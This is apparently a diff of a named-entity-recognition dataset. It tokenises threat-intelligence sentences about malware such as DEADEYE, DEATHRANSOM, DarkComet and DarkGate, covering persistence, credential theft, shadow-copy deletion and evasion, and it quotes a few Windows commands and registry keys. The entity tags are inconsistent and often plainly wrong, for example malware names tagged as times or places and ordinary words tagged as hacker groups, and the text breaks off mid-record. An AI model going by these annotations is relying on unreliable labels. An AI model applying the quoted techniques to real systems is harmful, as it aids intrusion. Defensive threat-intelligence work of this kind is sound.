- "by", - "identifying", - "the", - "victim's", - "volume", - "serial", - "number,", - "hostname,", - "and/or", - "DNS", - "domain." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEADEYE", - "has", - "used", - "`schtasks", - "/change`", - "to", - "modify", - "scheduled", - "tasks", - "including", - "`\\Microsoft\\Windows\\PLA\\Server", - "Manager", - "Performance", - "Monitor`,", - "`\\Microsoft\\Windows\\Ras\\ManagerMobility,", - "\\Microsoft\\Windows\\WDI\\SrvSetupResults`,", - "and", - "`\\Microsoft\\Windows\\WDI\\USOShared`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEADEYE", - "can", - "use", - "`msiexec.exe`", - "for", - "execution", - "of", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "DEADEYE.EMBED", - "variant", - "of", - "DEADEYE", - "can", - "embed", - "its", - "payload", - "in", - "an", - "alternate", - "data", - "stream", - "of", - "a", - "local", - "file." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEADEYE", - "can", - "execute", - "the", - "`GetComputerNameA`", - "and", - "`GetComputerNameExA`", - "WinAPI", - "functions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "DEADEYE", - "can", - "use", - "`rundll32.exe`", - "for", - "execution", - "of", - "living", - "off", - "the", - "land", - "binaries", - "(lolbin)", - "such", - "as", - "`SHELL32.DLL`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "DEADEYE", - "has", - "used", - "the", - "scheduled", - "tasks", - "`\\Microsoft\\Windows\\PLA\\Server", - "Manager", - "Performance", - "Monitor`,", - "`\\Microsoft\\Windows\\Ras\\ManagerMobility`,", - "`\\Microsoft\\Windows\\WDI\\SrvSetupResults`,", - "and", - "`\\Microsoft\\Windows\\WDI\\USOShared`", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEADEYE", - "can", - "enumerate", - "a", - "victim", - "computer's", - "volume", - "serial", - "number", - "and", - "host", - "name." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEADEYE", - "can", - "discover", - "the", - "DNS", - "domain", - "name", - "of", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEADEYE", - "can", - "run", - "`cmd", - "/c", - "copy", - "/y", - "/b", - "C:\\Users\\public\\syslog_6-*.dat", - "C:\\Users\\public\\syslog.dll`", - "to", - "combine", - "separated", - "sections", - "of", - "code", - "into", - "a", - "single", - "DLL", - "prior", - "to", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEATHRANSOM", - "can", - "use", - "public", - "and", - "private", - "key", - "pair", - "encryption", - "to", - "encrypt", - "files", - "for", - "ransom", - "payment." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "B-OffAct", - "O" - ] - }, - { - "tokens": [ - "DEATHRANSOM", - "can", - "use", - "loop", - "operations", - "to", - "enumerate", - "directories", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Tool", - "B-Features", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEATHRANSOM", - "can", - "download", - "files", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEATHRANSOM", - "can", - "delete", - "volume", - "shadow", - "copies", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEATHRANSOM", - "has", - "the", - "ability", - "to", - "use", - "loop", - "operations", - "to", - "enumerate", - "network", - "resources." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-OffAct", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "DEATHRANSOM", - "can", - "enumerate", - "logical", - "drives", - "on", - "a", - "target", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "versions", - "of", - "DEATHRANSOM", - "have", - "performed", - "language", - "ID", - "and", - "keyboard", - "layout", - "checks;", - "if", - "either", - "of", - "these", - "matched", - "Russian,", - "Kazakh,", - "Belarusian,", - "Ukrainian", - "or", - "Tatar", - "DEATHRANSOM", - "would", - "exit." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Area", - "B-Area", - "B-Area", - "B-Area", - "O", - "B-Area", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "DEATHRANSOM", - "can", - "use", - "HTTPS", - "to", - "download", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DEATHRANSOM", - "has", - "the", - "ability", - "to", - "use", - "WMI", - "to", - "delete", - "volume", - "shadow", - "copies." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "DOGCALL", - "can", - "capture", - "microphone", - "data", - "from", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DOGCALL", - "is", - "capable", - "of", - "leveraging", - "cloud", - "storage", - "APIs", - "such", - "as", - "Cloud,", - "Box,", - "Dropbox,", - "and", - "Yandex", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Tool", - "B-Tool", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "DOGCALL", - "is", - "encrypted", - "using", - "single-byte", - "XOR." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "DOGCALL", - "can", - "download", - "and", - "execute", - "additional", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "DOGCALL", - "is", - "capable", - "of", - "logging", - "keystrokes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "DOGCALL", - "is", - "capable", - "of", - "capturing", - "screenshots", - "of", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus", - "can", - "collect", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus", - "can", - "use", - "`IsDebuggerPresent`", - "to", - "detect", - "whether", - "a", - "debugger", - "is", - "present", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus", - "can", - "deploy", - "additional", - "tools", - "onto", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus", - "has", - "been", - "named", - "`Flash.exe`,", - "and", - "its", - "dropper", - "has", - "been", - "named", - "`IExplorer`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus", - "can", - "use", - "various", - "API", - "calls", - "to", - "see", - "if", - "it", - "is", - "running", - "in", - "a", - "sandbox." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus", - "can", - "be", - "partly", - "encrypted", - "with", - "XOR." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus", - "can", - "enumerate", - "and", - "examine", - "running", - "processes", - "to", - "determine", - "if", - "a", - "debugger", - "is", - "present." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus", - "can", - "search", - "for", - "other", - "machines", - "connected", - "to", - "compromised", - "host", - "and", - "attempt", - "to", - "map", - "the", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus's", - "dropper", - "can", - "be", - "packed", - "with", - "UPX." - ], - "ner_tags": [ - "B-Idus", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DRATzarus", - "can", - "obtain", - "a", - "list", - "of", - "users", - "from", - "an", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus", - "can", - "use", - "the", - "`GetTickCount`", - "and", - "`GetSystemTimeAsFileTime`", - "API", - "calls", - "to", - "inspect", - "system", - "time." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus", - "can", - "use", - "the", - "`GetTickCount`", - "and", - "`GetSystemTimeAsFileTime`", - "API", - "calls", - "to", - "measure", - "function", - "timing.", - "DRATzarus", - "can", - "also", - "remotely", - "shut", - "down", - "into", - "sleep", - "mode", - "under", - "specific", - "conditions", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DRATzarus", - "can", - "use", - "HTTP", - "or", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dacls", - "can", - "encrypt", - "its", - "configuration", - "file", - "with", - "AES", - "CBC." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Dacls", - "can", - "scan", - "directories", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dacls", - "has", - "had", - "its", - "payload", - "named", - "with", - "a", - "dot", - "prefix", - "to", - "make", - "it", - "hidden", - "from", - "view", - "in", - "the", - "Finder", - "application." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dacls", - "can", - "download", - "its", - "payload", - "from", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dacls", - "can", - "establish", - "persistence", - "via", - "a", - "LaunchAgent." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Dacls", - "can", - "establish", - "persistence", - "via", - "a", - "Launch", - "Daemon." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "Dacls", - "Mach-O", - "binary", - "has", - "been", - "disguised", - "as", - "a", - ".nib", - "file." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Dacls", - "can", - "collect", - "data", - "on", - "running", - "and", - "parent", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Dacls", - "can", - "use", - "HTTPS", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "can", - "use", - "use", - "IPv4", - "A", - "records", - "and", - "IPv6", - "AAAA", - "DNS", - "records", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "can", - "upload", - "files", - "from", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "can", - "use", - "a", - "VBA", - "macro", - "to", - "decode", - "its", - "payload", - "prior", - "to", - "installation", - "and", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "can", - "Base64", - "encode", - "its", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "can", - "delete", - "its", - "configuration", - "file", - "after", - "installation." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "can", - "download", - "additional", - "files", - "to", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "has", - "relied", - "on", - "victims'", - "opening", - "a", - "malicious", - "file", - "for", - "initial", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "files", - "have", - "been", - "named", - "`UltraVNC.exe`", - "and", - "`WINVNC.exe`", - "to", - "appear", - "as", - "legitimate", - "VNC", - "tools." - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "can", - "use", - "a", - "scheduled", - "task", - "for", - "installation." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "has", - "been", - "distributed", - "within", - "a", - "malicious", - "Excel", - "attachment", - "via", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "can", - "use", - "VNC", - "for", - "remote", - "access", - "to", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "can", - "use", - "a", - "VBA", - "macro", - "embedded", - "in", - "an", - "Excel", - "file", - "to", - "drop", - "the", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "can", - "use", - "HTTP", - "in", - "C2", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DanBot", - "has", - "the", - "ability", - "to", - "execute", - "arbitrary", - "commands", - "via", - "`cmd.exe`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "listen", - "in", - "to", - "victims'", - "conversations", - "through", - "the", - "system’s", - "microphone." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "steal", - "data", - "from", - "the", - "clipboard." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "execute", - "various", - "types", - "of", - "scripts", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "disable", - "Security", - "Center", - "functions", - "like", - "the", - "Windows", - "Firewall." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "disable", - "Security", - "Center", - "functions", - "like", - "anti-virus." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "load", - "any", - "files", - "onto", - "the", - "infected", - "machine", - "to", - "execute." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "has", - "a", - "keylogging", - "capability." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "has", - "dropped", - "itself", - "onto", - "victim", - "machines", - "with", - "file", - "names", - "such", - "as", - "WinDefender.Exe", - "and", - "winupdate.exe", - "in", - "an", - "apparent", - "attempt", - "to", - "masquerade", - "as", - "a", - "legitimate", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "adds", - "a", - "Registry", - "value", - "for", - "its", - "installation", - "routine", - "to", - "the", - "Registry", - "Key", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", - "Enable", - "LUA=”0”</code>", - "and", - "<code>HKEY_CURRENT_USER\\Software\\DC3_FEXEC</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "list", - "active", - "processes", - "running", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "adds", - "several", - "Registry", - "entries", - "to", - "enable", - "automatic", - "execution", - "at", - "every", - "system", - "startup." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "open", - "an", - "active", - "screen", - "of", - "the", - "victim’s", - "machine", - "and", - "take", - "control", - "of", - "the", - "mouse", - "and", - "keyboard." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "has", - "the", - "option", - "to", - "compress", - "its", - "payload", - "using", - "UPX", - "or", - "MPRESS." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "collect", - "the", - "computer", - "name,", - "RAM", - "used,", - "and", - "operating", - "system", - "version", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "gathers", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "access", - "the", - "victim’s", - "webcam", - "to", - "take", - "pictures." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "use", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkComet", - "can", - "launch", - "a", - "remote", - "shell", - "to", - "execute", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "elevates", - "accounts", - "created", - "through", - "the", - "malware", - "to", - "the", - "local", - "administration", - "group", - "during", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "will", - "search", - "for", - "cryptocurrency", - "wallets", - "by", - "examining", - "application", - "window", - "names", - "for", - "specific", - "strings.", - "DarkGate", - "extracts", - "information", - "collected", - "via", - "NirSoft", - "tools", - "from", - "the", - "hosting", - "process's", - "memory", - "by", - "first", - "identifying", - "the", - "window", - "through", - "the", - "<code>FindWindow</code>", - "API", - "function." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "uses", - "AutoIt", - "scripts", - "dropped", - "to", - "a", - "hidden", - "directory", - "during", - "initial", - "installation", - "phases,", - "such", - "as", - "`test.au3`." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "DarkGate", - "searches", - "for", - "stored", - "credentials", - "associated", - "with", - "cryptocurrency", - "wallets", - "and", - "notifies", - "the", - "command", - "and", - "control", - "server", - "when", - "identified." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "uses", - "two", - "distinct", - "User", - "Account", - "Control", - "(UAC)", - "bypass", - "techniques", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "starts", - "a", - "thread", - "on", - "execution", - "that", - "captures", - "clipboard", - "data", - "and", - "logs", - "it", - "to", - "a", - "predefined", - "log", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "use", - "Nirsoft", - "Network", - "Password", - "Recovery", - "or", - "NetPass", - "tools", - "to", - "steal", - "stored", - "RDP", - "credentials", - "in", - "some", - "malware", - "versions." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "B-Tool", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "includes", - "one", - "infection", - "vector", - "that", - "leverages", - "a", - "malicious", - "\"KeyScramblerE.DLL\"", - "library", - "that", - "will", - "load", - "during", - "the", - "execution", - "of", - "the", - "legitimate", - "KeyScrambler", - "application." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "can", - "cloak", - "command", - "and", - "control", - "traffic", - "in", - "DNS", - "records", - "from", - "legitimate", - "services", - "to", - "avoid", - "reputation-based", - "detection", - "techniques." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Way", - "I-Way", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "can", - "deploy", - "follow-on", - "ransomware", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "will", - "retrieved", - "encrypted", - "commands", - "from", - "its", - "command", - "and", - "control", - "server", - "for", - "follow-on", - "actions", - "such", - "as", - "cryptocurrency", - "mining." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "checks", - "the", - "<code>BeingDebugged</code>", - "flag", - "in", - "the", - "PEB", - "structure", - "during", - "execution", - "to", - "identify", - "if", - "the", - "malware", - "is", - "being", - "debugged." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "installation", - "includes", - "binary", - "code", - "stored", - "in", - "a", - "file", - "located", - "in", - "a", - "hidden", - "directory,", - "such", - "as", - "<code>shell.txt</code>,", - "that", - "is", - "decrypted", - "then", - "executed.", - "DarkGate", - "uses", - "hexadecimal-encoded", - "shellcode", - "payloads", - "during", - "installation", - "that", - "are", - "called", - "via", - "Windows", - "API", - "<code>CallWindowProc()</code>", - "to", - "decode", - "and", - "then", - "execute." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkGate", - "will", - "terminate", - "processes", - "associated", - "with", - "several", - "security", - "software", - "products", - "if", - "identified", - "during", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - 